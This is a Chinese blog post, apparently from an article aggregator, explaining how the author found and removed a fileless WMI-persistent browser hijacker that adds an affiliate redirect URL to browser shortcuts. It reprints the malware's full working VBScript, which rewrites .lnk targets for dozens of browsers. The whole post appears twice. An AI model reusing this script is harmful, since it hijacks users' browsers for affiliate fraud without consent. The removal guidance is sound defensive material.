“http://hao643.com/?r=wwwww&m=c166” 类似这样的恶意链接去除方法
2017-11-29 09:49
337 查看
网络中游荡,不经意间就被感染,感染后不痛但是让人瘙痒烦躁。
首先说明出现的问题,发现电脑每次开机、不定时(也许这个病毒设置的就是定时,没有具体统计)的出现 谷歌浏览器、ie浏览器 的快捷方式被修改,我修改和还原后没用,不躲久就又加上恶意网址链接了。我已经把注册表、各种浏览器的的主页都更改了,没用。恶意修改后如下:
eg:"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://hao643.com/?r=wwwww&m=c166
这是我的谷歌浏览器被恶意更改后,后果是,每次打开都会跳到 https://www.hao123.com/?tn=97175858_hao_pg,分析这个网址,前面 https://www.hao123.com/,hao123是一个上网导航(Directindustry
Web Guide),百度旗下 “核心” 产品。后面的 ?tn=97175858_hao_pg ,tn(是technology的缩写么?)等号的后面的数字是推广员的推广编号 97175858,_hao_pg :这个大概表示的就是 “hao” 下的 pg(大概是page的意思),所以说你访问了这个网址,就会给这个推广员赚钱。
对了,还有开头的 http://hao643.com/?r=wwwww&m=c166 ,这个网址就是一个跳板,每次访问他都会跳到 https://www.hao123.com/?tn=97175858_hao_pg ,暂且留坑,以后搞明白了利弊再分析。
如果你出现了类似的问题,并且检查过注册表、更改了浏览器的主页、杀毒软件查杀过全部系统,但还是没有效果。不用担心,我现在就有一个妙方。
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装,
http://www.cr173.com/soft/88291.html
安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2” (我的是默认出现的,如果这个不行,可以试试填入“root\subscription”),确定,出现下图:
Filters 下,也许每个人的情况会不同,但是关键是在右面右键点击 ActiveScript... ,选择view instance properties ,会出现:
就是这里,ScriptText里面,有Value,我这个感染的代码是:
On Error Resume Next:Const link = "http://hao643.com/?r=wwwww&m=c166":Const link360 = "http://hao643.com/?r=wwwww&m=c166&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths
= "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet
Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr
= split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder
In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path)
& "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End
If:End If:Next:End If:Next:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!
受到影响的浏览器有(各色浏览器,差不多齐了):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe",
"liebao.exe", "QQBrowser.exe"
最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!
删不掉?
到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
嗯,好歹这苍蝇到底还是吐出去了!
参考自:http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html
首先说明出现的问题,发现电脑每次开机、不定时(也许这个病毒设置的就是定时,没有具体统计)的出现 谷歌浏览器、ie浏览器 的快捷方式被修改,我修改和还原后没用,不躲久就又加上恶意网址链接了。我已经把注册表、各种浏览器的的主页都更改了,没用。恶意修改后如下:
eg:"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://hao643.com/?r=wwwww&m=c166
这是我的谷歌浏览器被恶意更改后,后果是,每次打开都会跳到 https://www.hao123.com/?tn=97175858_hao_pg,分析这个网址,前面 https://www.hao123.com/,hao123是一个上网导航(Directindustry
Web Guide),百度旗下 “核心” 产品。后面的 ?tn=97175858_hao_pg ,tn(是technology的缩写么?)等号的后面的数字是推广员的推广编号 97175858,_hao_pg :这个大概表示的就是 “hao” 下的 pg(大概是page的意思),所以说你访问了这个网址,就会给这个推广员赚钱。
对了,还有开头的 http://hao643.com/?r=wwwww&m=c166 ,这个网址就是一个跳板,每次访问他都会跳到 https://www.hao123.com/?tn=97175858_hao_pg ,暂且留坑,以后搞明白了利弊再分析。
如果你出现了类似的问题,并且检查过注册表、更改了浏览器的主页、杀毒软件查杀过全部系统,但还是没有效果。不用担心,我现在就有一个妙方。
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装,
http://www.cr173.com/soft/88291.html
安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2” (我的是默认出现的,如果这个不行,可以试试填入“root\subscription”),确定,出现下图:
Filters 下,也许每个人的情况会不同,但是关键是在右面右键点击 ActiveScript... ,选择view instance properties ,会出现:
就是这里,ScriptText里面,有Value,我这个感染的代码是:
On Error Resume Next:Const link = "http://hao643.com/?r=wwwww&m=c166":Const link360 = "http://hao643.com/?r=wwwww&m=c166&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths
= "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet
Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr
= split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder
In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path)
& "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End
If:End If:Next:End If:Next:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!
受到影响的浏览器有(各色浏览器,差不多齐了):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe",
"liebao.exe", "QQBrowser.exe"
最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!
删不掉?
到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
嗯,好歹这苍蝇到底还是吐出去了!
参考自:http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html
相关文章推荐
- “http://hao643.com/?r=wwwww&m=c166” 类似这样的恶意链接去除方法
- 去除:http://init.phpwind.net/init.php 方法
- 恶意网站http://www.chaxun.com,近日不断受到这个无耻网站的弹出广告骚扰(已找到解决方法)
- Highcharts JS去除Highcharts.com链接的方法
- 使用httpclient实现http链接池与使用HttpURLConnection发送http请求的方法与性能对比
- PHP使用http_build_query()构造URL字符串的方法(可将POST参数组转换拼接成GET请求链接)
- 实现类似textarea这样可以滚动显示内容的方法
- 实现类似textarea这样可以滚动显示内容的方法
- CSS+JS方法去除点击链接,按钮时出现的虚线框
- 修复提示“无法定位程序输入点HttpAddurl于动态链接库cdfview.dll上”的方法
- 原因分析如下: 遇到这种情况,很有可能是把一个int型业务数据的 设置setText()或者类似的方法中, 这样Android系统就会主动去资源文件当中寻找, 但是它不是一个资源文件ID, 所
- 自己动手去除暴风影音2012广告方法,这样才安全
- Highcharts去除下标链接的方法
- 实现类似textarea这样可以滚动显示内容的方法
- 去除DedeCms 5.7后台版权广告链接的方法
- 当我们想点击一个链接实现删除或者类似的功能,想给出一个提示,具体实现方法
- 多种方法去除按钮以及链接点击时虚线
- iOS a 标签链接:<a href ="http://www.baidu.com">xxxx</a>提取xxxx的3种方法
- 在VC中链接动态链接库(DLL)的方法(转http://dev.csdn.net/author/absurd/7742f674e1044922aec48aa0b51b2597.html)